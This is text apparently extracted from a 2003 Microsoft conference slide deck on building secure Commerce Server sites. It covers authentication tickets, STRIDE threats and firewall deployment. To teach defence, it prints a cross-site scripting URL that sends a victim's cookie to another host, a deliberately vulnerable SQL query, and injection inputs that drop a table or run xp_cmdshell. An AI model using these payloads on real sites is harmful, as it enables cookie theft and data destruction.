Transcript EBZ314

EBZ314
Building Secure Commerce
Server Sites
Peter Oehlert SDET
Yet Huynh SDE
E-Business Server
Microsoft Corporation
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Authentication Components
Authentication Tickets
Profile Ticket
Authentication Ticket
Authentication .NET Classes
Cookie or URL support
Extended property support
Authentication Filter
ISAPI Filter, requires cookies
Modes of operation: windows, custom, auto-cookie
Flexible Login and helper pages
Authentication Tickets
Profile Ticket
Tracks anonymous user
Persistent cookie
Authentication Ticket
Tracks authenticated user
Session cookie
Other features
Links to profile object via UserID stored in the ticket
Custom properties
Can also be encoded on URL by QueryStringBuilder
class
AuthManager .NET Class
Manages authentication tickets
Sets encrypted tickets using configurable encryption
key
Support for rolling key encryption
Works in both cookie and cookieless scenarios
Login credential validation left to developer
Can use any data source as credential store
Integration with Data Warehouse
AuthManager Scenario
(Cookie)
Inetinfo process
Get Request (1)
Access is denied, redirect to Login Form (2)
ASPX Page
Browser
(IE,
Netscape)
userID/Password(3)
Redirected to original request with cookie(4)
Get Request (5)
with cookie
IsAuthenticated()?
OR UserId
Content (6)
Get Profile Data
Profile Service
Application Server
no
Logon
Form
using
Auth
.NET
Class
Authentication Filter
ISAPI Filter
Tightly integrated with AuthManager class
Exchange 2000 OWA support
Modes of operation
Windows Authentication (Active Directory)
Custom Authentication (Custom Database/Profile)
AutoCookie (allows mix)
Secures site at virtual directory
Requires Cookies
Authentication files located at /<vroot>/Authfiles
Custom branding
Login.asp HTML form used to submit UserID &
Password
And not browser dialog box
Windows Authentication
Runs thread under logged on user context
Secure resource using ACLs
Single sign on integration with Exchange 2000
OWA
Proxy Account Support
Granular access control using ACLs
Configurable
Can use single account for all
Map groups of logins to different proxy accounts
Custom Authentication And
AutoCookie
Runs thread under anonymous user account
Protects site at Vroot level (doesn’t use ACLs)
Allows web farm load balancing
Does not require session/server affinity
AutoCookie allows AuthFilter to issue Profile
Ticket to track anonymous users
Authentication .NET
Enhancements
Thin layer of abstraction over AuthManager
COM primary interop assembly
Authentication model remains the same (using
tickets with AuthManager alone or with the
AuthFilter)
Improved object model
Authentication .NET Object Model
AuthManager
AuthTicket
ProfileTicket
UserID
UserID
Properties…
CookieSupport
Properties…
AuthenticationInfo
SessionCookieSupport
QueryStringBuilder
PersistentCookieSupport
Authentication
Specific Exception
Classes
Authentication Module
HTTP module added via the web.config
<section name="authentication“
type="Microsoft.CommerceServer.Runtime.Configuration.Com
merceAuthenticationSectionHandler,
Microsoft.CommerceServer.Runtime, Version=4.5.2002.0,
Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
<authentication detectCookies="true" />
Creates per request instance of
AuthenticationInfo accessed via
CommerceContext
Automatic client cookie support detection
demo
.NET Commerce
Authentication Module
Yet Huynh
SDE
E-Business Server
FAQ
Passport like single sign on across
multiple sites
Commerce Authentication supports single
sign on across applications in the same
domain and across domains that share at
least one domain scope.
Ie. www.CommerceServer.microsoft.com
www.Office.Microsoft.com
www.Windows.Microsoft.com
Password cache is not encrypted in
AuthFilter
Requires access to Inetinfo process
space.
AuthFilter requires the admin connection
string to be a SQL connection string if
running IIS5x
The mitigating factor is the connection
string to the admin database is stored
encrypted in the registry. Also, this is no
longer a limitation with IIS6x.
Cookie replay issue with AuthManager
This is a limitation with all authentication
schemes that utilize cookies. A mitigating
factor is to use SSL to secure access to
the tickets.
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
STRIDE Threats
S - Spoofing Identity
T - Tampering with Data
R - Repudiation
I - Information Disclosure
D - Denial of Service
E - Elevation of Privilege
Common Web Security
Mistakes
All input is evil, until proven otherwise!
Cross Site Scripting
SQL Injection attacks
Cross-Site Scripting Issues
This attack has become common
Compromise the client through a flawed
server
Only takes one flawed page in the domain
The mistake is echoing user input
Because the input may be script!
CSS – How it Works
http://www.a.com/hello.asp?name=Blake
Hello, <% =Request.QueryString(“name”) %>
http://www.b.com/gather.asp
The Bad URL
http://www.a.com/hello.asp?name=
<FORM action=http://www.b.com/gather.asp method=post id=“idForm”>
<INPUT name=“cookie” type=“hidden”>
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie; idForm.submit();
</SCRIPT>
Trusting Input - A Vulnerable
Managed Code Example
using System.Data.SQLClient;
using System.Data.SQLTypes;
public static SqlMoney FreightByCargo(string company) {
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "select sum(cost) as cost " +
"from orders " +
"where companyname = ‘" + company + "’";
return cmd.ExecuteScalar();
}
Why It’s Wrong (1 Of 2)
Good Guy
Name: Foo Corp
SELECT sum(cost)
FROM orders
WHERE companyname='Foo Corp'
Bad Guy
Name: Blah' or 1=1 --
SELECT sum(cost)
FROM orders
WHERE companyname='Blah' or 1=1 -- '
Why It’s Wrong (2 Of 2)
Really Bad Guy
Name: b’ drop table orders -SELECT sum(cost)
FROM orders
WHERE companyname= 'b' drop table orders -- '
Downright Evil Guy
Name: b’ xp_cmdshell(‘fdisk.exe’) -SELECT sum(cost)
FROM orders
WHERE companyname= 'b' xp_cmdshell(‘fdisk.exe’) -- '
A More Secure
Managed Code Example
using System.Data.SqlServer;
using System.Data.SqlTypes;
public static SqlMoney FreightByCargo(string company) {
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "select sum(cost) as cost" +
"from orders " +
"where companyname = @CompanyName”;
SqlParameter param = cmd.Parameters.Add("@CompanyName",
company);
return cmd.ExecuteScalar( );
}
Input Remedies
Determine what is valid input and reject
everything else
Use Regular Expressions
Display user input only after sanitizing it
Passwords are problematic
Escape them using Server.URLEncode or
HttpServerUtility.URLEncode
Do not construct ad-hoc SQL queries
Use parameters or stored procs
NEVER use SA or DBO to logon to SQL Server
from any application
Defeats Least Privilege Principle
Input Testing Ideas
Enumerate all entry points to the app
Sockets, RPC, pipes, files, registry keys, SOAP params,
HTTP headers, form values, querystrings…
Use a tool which goes ‘underneath the radar’
Perl, C#, C++
Lie about the input
Make it too big, too small, non-existent, wrong data
type…
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Securing Your Site
Infrastructure
Firewall
Least Privilege Accounts (SQL, NT Services)
Throttle requests (Baskets, Checkouts, IIS)
Business Desk Security
Use NTLM authentication
Restrict Access
Module
Task
Field/Property
Admin DB
Clear text connection strings to Commerce DB’s
Use Windows Integrated Security for SQL
SiteConfigReadOnly, SiteConfig, GlobalConfig
Restrict executable scripts, components
Set ACLs on components
Securing Your Site
Commerce DB
Clear text connection string in UPM BizData store
Use Windows Integrated Security for SQL
Use encrypted network connection (SSL, IPSec, multi-protocol)
Encrypt user passwords, credit cards (UPM Encryption)
Set rights on DBs, Tables, SPs
Log files
Set ACLs on log directory
Use encrypted network connection (SSL, IPSec)
Strategic Technology Protection Program
IISLockDown
URLScan
HFNetCheck
Deployment Architecture
ISA
Firewall
Ethernet
ISA
Firewall
8x
9x
1x
2x
3x
10x
11x
12x
7x
8x
9x
4x
5x
6x
1x
2x
3x
10x
11x
12x
4x
5x
6x
7 8 9 101112
A
1 2 3 4 5 6
A
B
Web Server
Ethernet
AD
7x
C
7x
8x
9x
1x
2x
3x
Web Server
10x
11x
12x
7x
8x
9x
4x
5x
6x
1x
2x
3x
10x
11x
12x
4x
5x
6x
SMTP Server
C
7 8 9 101112
A
1 2 3 4 5 6
A
B
NLB
ISA
Firewall
ISA
Firewall
Ethernet
MSCS
7x
8x
9x
1x
2x
3x
10x
11x
12x
7x
8x
9x
4x
5x
6x
1x
2x
3x
10x
11x
12x
4x
5x
6x
C
7 8 9 101112
A
1 2 3 4 5 6
A
B
DW
MOM
AD
Bizdesk
Bizdesk
SQL
SQL
Firewall: Internet-to-Web
Ingress
To Web Cluster :
Web (80, 443)
To Dns
Dns (53)
Egress
From Web Cluster
Web (80, 443)
From Dns
Dns (53)
From SMTP
Smtp (25)
Firewall: Web-to-Data
Ingress
From Web to Sql:
SQL (1433)
DTC (135, 5000-5020*)
From AD to AD *
Egress
From Sql to Web
SQL (1433)
DTC (135, 5000-5020*)
* See Commerce Secure Deployment Guide
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Resources
Bulletins & hotfixes
http://www.microsoft.com/security
IISLockDown, URLScan, HFNetCheck
http://www.microsoft.com/technet/security/tools/tools.asp?frame=true
Online Guides
Web based security in Commerce Server 2002
http://www.microsoft.com/technet/prodtechnol/comm/comm2002/maintain/cs02wsec.asp
Deploying a Secure Commerce Server 2002 Site
http://www.microsoft.com/technet/prodtechnol/comm/comm2002/deploy/SecCncpt.asp
Building Secure ASP.Net Applications
http://msdn.microsoft.com/library/en-us/dnnetsec/html/secnetlpmsdn.asp
Windows Server 2003 Security Guide
http://go.microsoft.com/fwlink/?LinkId=14845
Windows Server 2000 Security Guide
http://www.microsoft.com/technet/security/prodtech/windows/secwin2k/default.asp
Product Documentation Refresh
http://go.microsoft.com/fwlink/?LinkId=6724
Suggested Reading And Resources
The tools you need to put technology to work!
TITLE
Building Solutions with
Microsoft® Commerce Server
2002:0-7356-1854Writing Secure Code
Second Edition
Available
Today
Today
Microsoft Press books are 20% off at the TechEd Bookstore
Also buy any TWO Microsoft Press books and get a FREE T-Shirt
Community Resources
Visit the E-Business MSFT Newsgroups
BizTalk :
http://www.microsoft.com/biztalk/community
Commerce Server:
http://www.microsoft.com/commerceserver/commu
nity
Content Management Server :
http://www.microsoft.com/cmserver/community
Share samples at http://www.gotdotnet.com
Community Resources
Community Resources
http://www.microsoft.com/communities/default.mspx
Most Valuable Professional (MVP)
http://www.mvp.support.microsoft.com/
Newsgroups
Converse online with Microsoft Newsgroups, including Worldwide
http://www.microsoft.com/communities/newsgroups/default.mspx
User Groups
Meet and learn with your peers
http://www.microsoft.com/communities/usergroups/default.mspx
evaluations
© 2003 Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.